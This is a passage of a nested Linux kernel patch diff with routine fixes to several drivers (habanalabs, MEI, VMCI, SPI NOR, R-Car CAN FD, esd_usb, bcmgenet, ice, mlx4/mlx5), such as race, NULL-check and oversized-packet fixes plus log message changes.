+ 						&interrupt->wait_list_lock, &pend);
+@@ -3227,7 +3226,19 @@ static int _hl_interrupt_wait_ioctl(struct hl_device *hdev, struct hl_ctx *ctx,
+ 	 * Note that we cannot have sorted list by target value,
+ 	 * in order to shorten the list pass loop, since
+ 	 * same list could have nodes for different cq counter handle.
++	 * Note:
++	 * Mark ts buff offset as in use here in the spinlock protection area
++	 * to avoid getting in the re-use section in ts_buff_get_kernel_ts_record
++	 * before adding the node to the list. this scenario might happen when
++	 * multiple threads are racing on same offset and one thread could
++	 * set the ts buff in ts_buff_get_kernel_ts_record then the other thread
++	 * takes over and get to ts_buff_get_kernel_ts_record and then we will try
++	 * to re-use the same ts buff offset, and will try to delete a non existing
++	 * node from the list.
+ 	 */
++	if (register_ts_record)
++		pend->ts_reg_info.in_use = 1;
++
+ 	list_add_tail(&pend->wait_list_node, &interrupt->wait_list_head);
+ 	spin_unlock_irqrestore(&interrupt->wait_list_lock, flags);
+ 
+diff --git a/drivers/misc/habanalabs/common/device.c b/drivers/misc/habanalabs/common/device.c
+index 87ab329e65d49..f7b9c3871518b 100644
+--- a/drivers/misc/habanalabs/common/device.c
++++ b/drivers/misc/habanalabs/common/device.c
+@@ -1566,7 +1566,8 @@ kill_processes:
+ 		if (rc == -EBUSY) {
+ 			if (hdev->device_fini_pending) {
+ 				dev_crit(hdev->dev,
+-					"Failed to kill all open processes, stopping hard reset\n");
++					"%s Failed to kill all open processes, stopping hard reset\n",
++					dev_name(&(hdev)->pdev->dev));
+ 				goto out_err;
+ 			}
+ 
+@@ -1576,7 +1577,8 @@ kill_processes:
+ 
+ 		if (rc) {
+ 			dev_crit(hdev->dev,
+-				"Failed to kill all open processes, stopping hard reset\n");
++				"%s Failed to kill all open processes, stopping hard reset\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			goto out_err;
+ 		}
+ 
+@@ -1627,14 +1629,16 @@ kill_processes:
+ 			 * ensure driver puts the driver in a unusable state
+ 			 */
+ 			dev_crit(hdev->dev,
+-				"Consecutive FW fatal errors received, stopping hard reset\n");
++				"%s Consecutive FW fatal errors received, stopping hard reset\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			rc = -EIO;
+ 			goto out_err;
+ 		}
+ 
+ 		if (hdev->kernel_ctx) {
+ 			dev_crit(hdev->dev,
+-				"kernel ctx was alive during hard reset, something is terribly wrong\n");
++				"%s kernel ctx was alive during hard reset, something is terribly wrong\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			rc = -EBUSY;
+ 			goto out_err;
+ 		}
+@@ -1752,9 +1756,13 @@ kill_processes:
+ 	hdev->reset_info.needs_reset = false;
+ 
+ 	if (hard_reset)
+-		dev_info(hdev->dev, "Successfully finished resetting the device\n");
++		dev_info(hdev->dev,
++			 "Successfully finished resetting the %s device\n",
++			 dev_name(&(hdev)->pdev->dev));
+ 	else
+-		dev_dbg(hdev->dev, "Successfully finished resetting the device\n");
++		dev_dbg(hdev->dev,
++			"Successfully finished resetting the %s device\n",
++			dev_name(&(hdev)->pdev->dev));
+ 
+ 	if (hard_reset) {
+ 		hdev->reset_info.hard_reset_cnt++;
+@@ -1789,7 +1797,9 @@ out_err:
+ 	hdev->reset_info.in_compute_reset = 0;
+ 
+ 	if (hard_reset) {
+-		dev_err(hdev->dev, "Failed to reset! Device is NOT usable\n");
++		dev_err(hdev->dev,
++			"%s Failed to reset! Device is NOT usable\n",
++			dev_name(&(hdev)->pdev->dev));
+ 		hdev->reset_info.hard_reset_cnt++;
+ 	} else if (reset_upon_device_release) {
+ 		spin_unlock(&hdev->reset_info.lock);
+@@ -2186,7 +2196,8 @@ int hl_device_init(struct hl_device *hdev, struct class *hclass)
+ 	}
+ 
+ 	dev_notice(hdev->dev,
+-		"Successfully added device to habanalabs driver\n");
++		"Successfully added device %s to habanalabs driver\n",
++		dev_name(&(hdev)->pdev->dev));
+ 
+ 	hdev->init_done = true;
+ 
+@@ -2235,11 +2246,11 @@ out_disabled:
+ 		device_cdev_sysfs_add(hdev);
+ 	if (hdev->pdev)
+ 		dev_err(&hdev->pdev->dev,
+-			"Failed to initialize hl%d. Device is NOT usable !\n",
+-			hdev->cdev_idx);
++			"Failed to initialize hl%d. Device %s is NOT usable !\n",
++			hdev->cdev_idx, dev_name(&(hdev)->pdev->dev));
+ 	else
+-		pr_err("Failed to initialize hl%d. Device is NOT usable !\n",
+-			hdev->cdev_idx);
++		pr_err("Failed to initialize hl%d. Device %s is NOT usable !\n",
++			hdev->cdev_idx, dev_name(&(hdev)->pdev->dev));
+ 
+ 	return rc;
+ }
+@@ -2295,7 +2306,8 @@ void hl_device_fini(struct hl_device *hdev)
+ 
+ 		if (ktime_compare(ktime_get(), timeout) > 0) {
+ 			dev_crit(hdev->dev,
+-				"Failed to remove device because reset function did not finish\n");
++				"%s Failed to remove device because reset function did not finish\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			return;
+ 		}
+ 	}
+diff --git a/drivers/misc/habanalabs/common/memory.c b/drivers/misc/habanalabs/common/memory.c
+index 5e9ae7600d75e..047306e33baad 100644
+--- a/drivers/misc/habanalabs/common/memory.c
++++ b/drivers/misc/habanalabs/common/memory.c
+@@ -2089,12 +2089,13 @@ static int hl_ts_mmap(struct hl_mmap_mem_buf *buf, struct vm_area_struct *vma, v
+ static int hl_ts_alloc_buf(struct hl_mmap_mem_buf *buf, gfp_t gfp, void *args)
+ {
+ 	struct hl_ts_buff *ts_buff = NULL;
+-	u32 size, num_elements;
++	u32 num_elements;
++	size_t size;
+ 	void *p;
+ 
+ 	num_elements = *(u32 *)args;
+ 
+-	ts_buff = kzalloc(sizeof(*ts_buff), GFP_KERNEL);
++	ts_buff = kzalloc(sizeof(*ts_buff), gfp);
+ 	if (!ts_buff)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/misc/mei/hdcp/mei_hdcp.c b/drivers/misc/mei/hdcp/mei_hdcp.c
+index e889a8bd7ac88..e0dcd5c114db1 100644
+--- a/drivers/misc/mei/hdcp/mei_hdcp.c
++++ b/drivers/misc/mei/hdcp/mei_hdcp.c
+@@ -859,8 +859,8 @@ static void mei_hdcp_remove(struct mei_cl_device *cldev)
+ 		dev_warn(&cldev->dev, "mei_cldev_disable() failed\n");
+ }
+ 
+-#define MEI_UUID_HDCP GUID_INIT(0xB638AB7E, 0x94E2, 0x4EA2, 0xA5, \
+-				0x52, 0xD1, 0xC5, 0x4B, 0x62, 0x7F, 0x04)
++#define MEI_UUID_HDCP UUID_LE(0xB638AB7E, 0x94E2, 0x4EA2, 0xA5, \
++			      0x52, 0xD1, 0xC5, 0x4B, 0x62, 0x7F, 0x04)
+ 
+ static const struct mei_cl_device_id mei_hdcp_tbl[] = {
+ 	{ .uuid = MEI_UUID_HDCP, .version = MEI_CL_VERSION_ANY },
+diff --git a/drivers/misc/mei/pxp/mei_pxp.c b/drivers/misc/mei/pxp/mei_pxp.c
+index 8dd09b1722ebd..7ee1fa7b1cb31 100644
+--- a/drivers/misc/mei/pxp/mei_pxp.c
++++ b/drivers/misc/mei/pxp/mei_pxp.c
+@@ -238,8 +238,8 @@ static void mei_pxp_remove(struct mei_cl_device *cldev)
+ }
+ 
+ /* fbf6fcf1-96cf-4e2e-a6a6-1bab8cbe36b1 : PAVP GUID*/
+-#define MEI_GUID_PXP GUID_INIT(0xfbf6fcf1, 0x96cf, 0x4e2e, 0xA6, \
+-			       0xa6, 0x1b, 0xab, 0x8c, 0xbe, 0x36, 0xb1)
++#define MEI_GUID_PXP UUID_LE(0xfbf6fcf1, 0x96cf, 0x4e2e, 0xA6, \
++			     0xa6, 0x1b, 0xab, 0x8c, 0xbe, 0x36, 0xb1)
+ 
+ static struct mei_cl_device_id mei_pxp_tbl[] = {
+ 	{ .uuid = MEI_GUID_PXP, .version = MEI_CL_VERSION_ANY },
+diff --git a/drivers/misc/vmw_vmci/vmci_host.c b/drivers/misc/vmw_vmci/vmci_host.c
+index da1e2a773823e..857b9851402a6 100644
+--- a/drivers/misc/vmw_vmci/vmci_host.c
++++ b/drivers/misc/vmw_vmci/vmci_host.c
+@@ -242,6 +242,8 @@ static int vmci_host_setup_notify(struct vmci_ctx *context,
+ 		context->notify_page = NULL;
+ 		return VMCI_ERROR_GENERIC;
+ 	}
++	if (context->notify_page == NULL)
++		return VMCI_ERROR_UNAVAILABLE;
+ 
+ 	/*
+ 	 * Map the locked page and set up notify pointer.
+diff --git a/drivers/mtd/mtdpart.c b/drivers/mtd/mtdpart.c
+index d442fa94c8720..85f5ee6f06fc6 100644
+--- a/drivers/mtd/mtdpart.c
++++ b/drivers/mtd/mtdpart.c
+@@ -577,6 +577,7 @@ static int mtd_part_of_parse(struct mtd_info *master,
+ {
+ 	struct mtd_part_parser *parser;
+ 	struct device_node *np;
++	struct device_node *child;
+ 	struct property *prop;
+ 	struct device *dev;
+ 	const char *compat;
+@@ -594,6 +595,15 @@ static int mtd_part_of_parse(struct mtd_info *master,
+ 	else
+ 		np = of_get_child_by_name(np, "partitions");
+ 
++	/*
++	 * Don't create devices that are added to a bus but will never get
++	 * probed. That'll cause fw_devlink to block probing of consumers of
++	 * this partition until the partition device is probed.
++	 */
++	for_each_child_of_node(np, child)
++		if (of_device_is_compatible(child, "nvmem-cells"))
++			of_node_set_flag(child, OF_POPULATED);
++
+ 	of_property_for_each_string(np, "compatible", prop, compat) {
+ 		parser = mtd_part_get_compatible_parser(compat);
+ 		if (!parser)
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index d67c926bca8ba..2ef2660f58180 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2026,6 +2026,15 @@ void spi_nor_set_erase_type(struct spi_nor_erase_type *erase, u32 size,
+ 	erase->size_mask = (1 << erase->size_shift) - 1;
+ }
+ 
++/**
++ * spi_nor_mask_erase_type() - mask out a SPI NOR erase type
++ * @erase:	pointer to a structure that describes a SPI NOR erase type
++ */
++void spi_nor_mask_erase_type(struct spi_nor_erase_type *erase)
++{
++	erase->size = 0;
++}
++
+ /**
+  * spi_nor_init_uniform_erase_map() - Initialize uniform erase map
+  * @map:		the erase map of the SPI NOR
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index f03b55cf7e6fe..958cd143c9346 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -684,6 +684,7 @@ void spi_nor_set_pp_settings(struct spi_nor_pp_command *pp, u8 opcode,
+ 
+ void spi_nor_set_erase_type(struct spi_nor_erase_type *erase, u32 size,
+ 			    u8 opcode);
++void spi_nor_mask_erase_type(struct spi_nor_erase_type *erase);
+ struct spi_nor_erase_region *
+ spi_nor_region_next(struct spi_nor_erase_region *region);
+ void spi_nor_init_uniform_erase_map(struct spi_nor_erase_map *map,
+diff --git a/drivers/mtd/spi-nor/sfdp.c b/drivers/mtd/spi-nor/sfdp.c
+index 8434f654eca1e..223906606ecb5 100644
+--- a/drivers/mtd/spi-nor/sfdp.c
++++ b/drivers/mtd/spi-nor/sfdp.c
+@@ -875,7 +875,7 @@ static int spi_nor_init_non_uniform_erase_map(struct spi_nor *nor,
+ 	 */
+ 	for (i = 0; i < SNOR_ERASE_TYPE_MAX; i++)
+ 		if (!(regions_erase_type & BIT(erase[i].idx)))
+-			spi_nor_set_erase_type(&erase[i], 0, 0xFF);
++			spi_nor_mask_erase_type(&erase[i]);
+ 
+ 	return 0;
+ }
+@@ -1089,7 +1089,7 @@ static int spi_nor_parse_4bait(struct spi_nor *nor,
+ 			erase_type[i].opcode = (dwords[1] >>
+ 						erase_type[i].idx * 8) & 0xFF;
+ 		else
+-			spi_nor_set_erase_type(&erase_type[i], 0u, 0xFF);
++			spi_nor_mask_erase_type(&erase_type[i]);
+ 	}
+ 
+ 	/*
+@@ -1228,7 +1228,7 @@ static int spi_nor_parse_sccr(struct spi_nor *nor,
+ 
+ 	le32_to_cpu_array(dwords, sccr_header->length);
+ 
+-	if (FIELD_GET(SCCR_DWORD22_OCTAL_DTR_EN_VOLATILE, dwords[22]))
++	if (FIELD_GET(SCCR_DWORD22_OCTAL_DTR_EN_VOLATILE, dwords[21]))
+ 		nor->flags |= SNOR_F_IO_MODE_EN_VOLATILE;
+ 
+ out:
+diff --git a/drivers/mtd/spi-nor/spansion.c b/drivers/mtd/spi-nor/spansion.c
+index b621cdfd506fd..07fe0f6fdfe3e 100644
+--- a/drivers/mtd/spi-nor/spansion.c
++++ b/drivers/mtd/spi-nor/spansion.c
+@@ -21,8 +21,13 @@
+ #define SPINOR_REG_CYPRESS_CFR3V		0x00800004
+ #define SPINOR_REG_CYPRESS_CFR3V_PGSZ		BIT(4) /* Page size. */
+ #define SPINOR_REG_CYPRESS_CFR5V		0x00800006
+-#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_EN	0x3
+-#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_DS	0
++#define SPINOR_REG_CYPRESS_CFR5_BIT6		BIT(6)
++#define SPINOR_REG_CYPRESS_CFR5_DDR		BIT(1)
++#define SPINOR_REG_CYPRESS_CFR5_OPI		BIT(0)
++#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_EN				\
++	(SPINOR_REG_CYPRESS_CFR5_BIT6 |	SPINOR_REG_CYPRESS_CFR5_DDR |	\
++	 SPINOR_REG_CYPRESS_CFR5_OPI)
++#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_DS	SPINOR_REG_CYPRESS_CFR5_BIT6
+ #define SPINOR_OP_CYPRESS_RD_FAST		0xee
+ 
+ /* Cypress SPI NOR flash operations. */
+diff --git a/drivers/net/can/rcar/rcar_canfd.c b/drivers/net/can/rcar/rcar_canfd.c
+index f6fa7157b99b0..77b21c82faf38 100644
+--- a/drivers/net/can/rcar/rcar_canfd.c
++++ b/drivers/net/can/rcar/rcar_canfd.c
+@@ -92,10 +92,10 @@
+ /* RSCFDnCFDGAFLCFG0 / RSCFDnGAFLCFG0 */
+ #define RCANFD_GAFLCFG_SETRNC(gpriv, n, x) \
+ 	(((x) & reg_v3u(gpriv, 0x1ff, 0xff)) << \
+-	 (reg_v3u(gpriv, 16, 24) - (n) * reg_v3u(gpriv, 16, 8)))
++	 (reg_v3u(gpriv, 16, 24) - ((n) & 1) * reg_v3u(gpriv, 16, 8)))
+ 
+ #define RCANFD_GAFLCFG_GETRNC(gpriv, n, x) \
+-	(((x) >> (reg_v3u(gpriv, 16, 24) - (n) * reg_v3u(gpriv, 16, 8))) & \
++	(((x) >> (reg_v3u(gpriv, 16, 24) - ((n) & 1) * reg_v3u(gpriv, 16, 8))) & \
+ 	 reg_v3u(gpriv, 0x1ff, 0xff))
+ 
+ /* RSCFDnCFDGAFLECTR / RSCFDnGAFLECTR */
+@@ -197,8 +197,8 @@
+ #define RCANFD_DCFG_DBRP(x)		(((x) & 0xff) << 0)
+ 
+ /* RSCFDnCFDCmFDCFG */
+-#define RCANFD_FDCFG_CLOE		BIT(30)
+-#define RCANFD_FDCFG_FDOE		BIT(28)
++#define RCANFD_V3U_FDCFG_CLOE		BIT(30)
++#define RCANFD_V3U_FDCFG_FDOE		BIT(28)
+ #define RCANFD_FDCFG_TDCE		BIT(9)
+ #define RCANFD_FDCFG_TDCOC		BIT(8)
+ #define RCANFD_FDCFG_TDCO(x)		(((x) & 0x7f) >> 16)
+@@ -429,8 +429,8 @@
+ #define RCANFD_C_RPGACC(r)		(0x1900 + (0x04 * (r)))
+ 
+ /* R-Car V3U Classical and CAN FD mode specific register map */
+-#define RCANFD_V3U_CFDCFG		(0x1314)
+ #define RCANFD_V3U_DCFG(m)		(0x1400 + (0x20 * (m)))
++#define RCANFD_V3U_FDCFG(m)		(0x1404 + (0x20 * (m)))
+ 
+ #define RCANFD_V3U_GAFL_OFFSET		(0x1800)
+ 
+@@ -689,12 +689,13 @@ static void rcar_canfd_tx_failure_cleanup(struct net_device *ndev)
+ static void rcar_canfd_set_mode(struct rcar_canfd_global *gpriv)
+ {
+ 	if (is_v3u(gpriv)) {
+-		if (gpriv->fdmode)
+-			rcar_canfd_set_bit(gpriv->base, RCANFD_V3U_CFDCFG,
+-					   RCANFD_FDCFG_FDOE);
+-		else
+-			rcar_canfd_set_bit(gpriv->base, RCANFD_V3U_CFDCFG,
+-					   RCANFD_FDCFG_CLOE);
++		u32 ch, val = gpriv->fdmode ? RCANFD_V3U_FDCFG_FDOE
++					    : RCANFD_V3U_FDCFG_CLOE;
++
++		for_each_set_bit(ch, &gpriv->channels_mask,
++				 gpriv->info->max_channels)
++			rcar_canfd_set_bit(gpriv->base, RCANFD_V3U_FDCFG(ch),
++					   val);
+ 	} else {
+ 		if (gpriv->fdmode)
+ 			rcar_canfd_set_bit(gpriv->base, RCANFD_GRMCFG,
+diff --git a/drivers/net/can/usb/esd_usb.c b/drivers/net/can/usb/esd_usb.c
+index 42323f5e6f3a0..578b25f873e58 100644
+--- a/drivers/net/can/usb/esd_usb.c
++++ b/drivers/net/can/usb/esd_usb.c
+@@ -239,41 +239,42 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 			   msg->msg.rx.dlc, state, ecc, rxerr, txerr);
+ 
+ 		skb = alloc_can_err_skb(priv->netdev, &cf);
+-		if (skb == NULL) {
+-			stats->rx_dropped++;
+-			return;
+-		}
+ 
+ 		if (state != priv->old_state) {
++			enum can_state tx_state, rx_state;
++			enum can_state new_state = CAN_STATE_ERROR_ACTIVE;
++
+ 			priv->old_state = state;
+ 
+ 			switch (state & ESD_BUSSTATE_MASK) {
+ 			case ESD_BUSSTATE_BUSOFF:
+-				priv->can.state = CAN_STATE_BUS_OFF;
+-				cf->can_id |= CAN_ERR_BUSOFF;
+-				priv->can.can_stats.bus_off++;
++				new_state = CAN_STATE_BUS_OFF;
+ 				can_bus_off(priv->netdev);
+ 				break;
+ 			case ESD_BUSSTATE_WARN:
+-				priv->can.state = CAN_STATE_ERROR_WARNING;
+-				priv->can.can_stats.error_warning++;
++				new_state = CAN_STATE_ERROR_WARNING;
+ 				break;
+ 			case ESD_BUSSTATE_ERRPASSIVE:
+-				priv->can.state = CAN_STATE_ERROR_PASSIVE;
+-				priv->can.can_stats.error_passive++;
++				new_state = CAN_STATE_ERROR_PASSIVE;
+ 				break;
+ 			default:
+-				priv->can.state = CAN_STATE_ERROR_ACTIVE;
++				new_state = CAN_STATE_ERROR_ACTIVE;
+ 				txerr = 0;
+ 				rxerr = 0;
+ 				break;
+ 			}
+-		} else {
++
++			if (new_state != priv->can.state) {
++				tx_state = (txerr >= rxerr) ? new_state : 0;
++				rx_state = (txerr <= rxerr) ? new_state : 0;
++				can_change_state(priv->netdev, cf,
++						 tx_state, rx_state);
++			}
++		} else if (skb) {
+ 			priv->can.can_stats.bus_error++;
+ 			stats->rx_errors++;
+ 
+-			cf->can_id |= CAN_ERR_PROT | CAN_ERR_BUSERROR |
+-				      CAN_ERR_CNT;
++			cf->can_id |= CAN_ERR_PROT | CAN_ERR_BUSERROR;
+ 
+ 			switch (ecc & SJA1000_ECC_MASK) {
+ 			case SJA1000_ECC_BIT:
+@@ -286,7 +287,6 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 				cf->data[2] |= CAN_ERR_PROT_STUFF;
+ 				break;
+ 			default:
+-				cf->data[3] = ecc & SJA1000_ECC_SEG;
+ 				break;
+ 			}
+ 
+@@ -294,20 +294,22 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 			if (!(ecc & SJA1000_ECC_DIR))
+ 				cf->data[2] |= CAN_ERR_PROT_TX;
+ 
+-			if (priv->can.state == CAN_STATE_ERROR_WARNING ||
+-			    priv->can.state == CAN_STATE_ERROR_PASSIVE) {
+-				cf->data[1] = (txerr > rxerr) ?
+-					CAN_ERR_CRTL_TX_PASSIVE :
+-					CAN_ERR_CRTL_RX_PASSIVE;
+-			}
+-			cf->data[6] = txerr;
+-			cf->data[7] = rxerr;
++			/* Bit stream position in CAN frame as the error was detected */
++			cf->data[3] = ecc & SJA1000_ECC_SEG;
+ 		}
+ 
+ 		priv->bec.txerr = txerr;
+ 		priv->bec.rxerr = rxerr;
+ 
+-		netif_rx(skb);
++		if (skb) {
++			cf->can_id |= CAN_ERR_CNT;
++			cf->data[6] = txerr;
++			cf->data[7] = rxerr;
++
++			netif_rx(skb);
++		} else {
++			stats->rx_dropped++;
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index 21973046b12b4..d937daa8ee883 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -2316,6 +2316,14 @@ static unsigned int bcmgenet_desc_rx(struct bcmgenet_rx_ring *ring,
+ 			  __func__, p_index, ring->c_index,
+ 			  ring->read_ptr, dma_length_status);
+ 
++		if (unlikely(len > RX_BUF_LENGTH)) {
++			netif_err(priv, rx_status, dev, "oversized packet\n");
++			dev->stats.rx_length_errors++;
++			dev->stats.rx_errors++;
++			dev_kfree_skb_any(skb);
++			goto next;
++		}
++
+ 		if (unlikely(!(dma_flag & DMA_EOP) || !(dma_flag & DMA_SOP))) {
+ 			netif_err(priv, rx_status, dev,
+ 				  "dropping fragmented packet!\n");
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index b615176338b26..be042905ada2a 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -176,15 +176,6 @@ void bcmgenet_phy_power_set(struct net_device *dev, bool enable)
+ 
+ static void bcmgenet_moca_phy_setup(struct bcmgenet_priv *priv)
+ {
+-	u32 reg;
+-
+-	if (!GENET_IS_V5(priv)) {
+-		/* Speed settings are set in bcmgenet_mii_setup() */
+-		reg = bcmgenet_sys_readl(priv, SYS_PORT_CTRL);
+-		reg |= LED_ACT_SOURCE_MAC;
+-		bcmgenet_sys_writel(priv, reg, SYS_PORT_CTRL);
+-	}
+-
+ 	if (priv->hw_params->flags & GENET_HAS_MOCA_LINK_DET)
+ 		fixed_phy_set_link_update(priv->dev->phydev,
+ 					  bcmgenet_fixed_phy_link_update);
+@@ -217,6 +208,8 @@ int bcmgenet_mii_config(struct net_device *dev, bool init)
+ 
+ 		if (!phy_name) {
+ 			phy_name = "MoCA";
++			if (!GENET_IS_V5(priv))
++				port_ctrl |= LED_ACT_SOURCE_MAC;
+ 			bcmgenet_moca_phy_setup(priv);
+ 		}
+ 		break;
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 8ec24f6cf6beb..3811462824390 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -6182,15 +6182,12 @@ int ice_vsi_cfg(struct ice_vsi *vsi)
+ {
+ 	int err;
+ 
+-	if (vsi->netdev) {
++	if (vsi->netdev && vsi->type == ICE_VSI_PF) {
+ 		ice_set_rx_mode(vsi->netdev);
+ 
+-		if (vsi->type != ICE_VSI_LB) {
+-			err = ice_vsi_vlan_setup(vsi);
+-
+-			if (err)
+-				return err;
+-		}
++		err = ice_vsi_vlan_setup(vsi);
++		if (err)
++			return err;
+ 	}
+ 	ice_vsi_cfg_dcb_rings(vsi);
+ 
+@@ -6371,7 +6368,7 @@ static int ice_up_complete(struct ice_vsi *vsi)
+ 
+ 	if (vsi->port_info &&
+ 	    (vsi->port_info->phy.link_info.link_info & ICE_AQ_LINK_UP) &&
+-	    vsi->netdev) {
++	    vsi->netdev && vsi->type == ICE_VSI_PF) {
+ 		ice_print_link_msg(vsi, true);
+ 		netif_tx_start_all_queues(vsi->netdev);
+ 		netif_carrier_on(vsi->netdev);
+@@ -6382,7 +6379,9 @@ static int ice_up_complete(struct ice_vsi *vsi)
+ 	 * set the baseline so counters are ready when interface is up
+ 	 */
+ 	ice_update_eth_stats(vsi);
+-	ice_service_task_schedule(pf);
++
++	if (vsi->type == ICE_VSI_PF)
++		ice_service_task_schedule(pf);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c
+index d63161d73eb16..3abc8db1d0659 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.c
+@@ -2269,7 +2269,7 @@ static void ice_ptp_set_caps(struct ice_pf *pf)
+ 	snprintf(info->name, sizeof(info->name) - 1, "%s-%s-clk",
+ 		 dev_driver_string(dev), dev_name(dev));
+ 	info->owner = THIS_MODULE;
+-	info->max_adj = 999999999;
++	info->max_adj = 100000000;
+ 	info->adjtime = ice_ptp_adjtime;
+ 	info->adjfine = ice_ptp_adjfine;
+ 	info->gettimex64 = ice_ptp_gettimex64;
+diff --git a/drivers/net/ethernet/mellanox/mlx4/en_tx.c b/drivers/net/ethernet/mellanox/mlx4/en_tx.c
+index c5758637b7bed..2f79378fbf6ec 100644
+--- a/drivers/net/ethernet/mellanox/mlx4/en_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx4/en_tx.c
+@@ -699,32 +699,32 @@ static void build_inline_wqe(struct mlx4_en_tx_desc *tx_desc,
+ 			inl->byte_count = cpu_to_be32(1 << 31 | skb->len);
+ 		} else {
+ 			inl->byte_count = cpu_to_be32(1 << 31 | MIN_PKT_LEN);
+-			memset(((void *)(inl + 1)) + skb->len, 0,
++			memset(inl->data + skb->len, 0,
+ 			       MIN_PKT_LEN - skb->len);
+ 		}
+-		skb_copy_from_linear_data(skb, inl + 1, hlen);
++		skb_copy_from_linear_data(skb, inl->data, hlen);
+ 		if (shinfo->nr_frags)
+-			memcpy(((void *)(inl + 1)) + hlen, fragptr,
++			memcpy(inl->data + hlen, fragptr,
+ 			       skb_frag_size(&shinfo->frags[0]));
+ 
+ 	} else {
+ 		inl->byte_count = cpu_to_be32(1 << 31 | spc);
+ 		if (hlen <= spc) {
+-			skb_copy_from_linear_data(skb, inl + 1, hlen);
++			skb_copy_from_linear_data(skb, inl->data, hlen);
+ 			if (hlen < spc) {
+-				memcpy(((void *)(inl + 1)) + hlen,
++				memcpy(inl->data + hlen,
+ 				       fragptr, spc - hlen);
+ 				fragptr +=  spc - hlen;
+ 			}
+-			inl = (void *) (inl + 1) + spc;
+-			memcpy(((void *)(inl + 1)), fragptr, skb->len - spc);
++			inl = (void *)inl->data + spc;
++			memcpy(inl->data, fragptr, skb->len - spc);
+ 		} else {
+-			skb_copy_from_linear_data(skb, inl + 1, spc);
+-			inl = (void *) (inl + 1) + spc;
+-			skb_copy_from_linear_data_offset(skb, spc, inl + 1,
++			skb_copy_from_linear_data(skb, inl->data, spc);
++			inl = (void *)inl->data + spc;
++			skb_copy_from_linear_data_offset(skb, spc, inl->data,
+ 							 hlen - spc);
+ 			if (shinfo->nr_frags)
+-				memcpy(((void *)(inl + 1)) + hlen - spc,
++				memcpy(inl->data + hlen - spc,
+ 				       fragptr,
+ 				       skb_frag_size(&shinfo->frags[0]));
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index 5b05b884b5fb3..d7b2ee5de1158 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -603,7 +603,7 @@ static int mlx5_tracer_handle_string_trace(struct mlx5_fw_tracer *tracer,
+ 	} else {
+ 		cur_string = mlx5_tracer_message_get(tracer, tracer_event);
+ 		if (!cur_string) {
+-			pr_debug("%s Got string event for unknown string tdsm: %d\n",
++			pr_debug("%s Got string event for unknown string tmsn: %d\n",
+ 				 __func__, tracer_event->string_event.tmsn);
+ 			return -1;
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
+index 8bed9c3610754..d739d77d68986 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
+@@ -119,7 +119,7 @@ struct mlx5e_ipsec_work {
+ };
+ 
+ struct mlx5e_ipsec_aso {
+-	u8 ctx[MLX5_ST_SZ_BYTES(ipsec_aso)];
++	u8 __aligned(64) ctx[MLX5_ST_SZ_BYTES(ipsec_aso)];
+ 	dma_addr_t dma_addr;
+ 	struct mlx5_aso *aso;
+ 	/* Protect ASO WQ access, as it is global to whole IPsec */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 0eb50be175cc4..64d4e7125e9bb 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -219,7 +219,8 @@ static int alloc_4k(struct mlx5_core_dev *dev, u64 *addr, u32 function)
+ 
+ 	n = find_first_bit(&fp->bitmask, 8 * sizeof(fp->bitmask));
+ 	if (n >= MLX5_NUM_4K_IN_PAGE) {
+-		mlx5_core_warn(dev, "alloc 4k bug\n");
++		mlx5_core_warn(dev, "alloc 4k bug: fw page = 0x%llx, n = %u, bitmask: %lu, max num of 4K pages: %d\n",
++			       fp->addr, n, fp->bitmask,  MLX5_NUM_4K_IN_PAGE);
+ 		return -ENOENT;
+ 	}
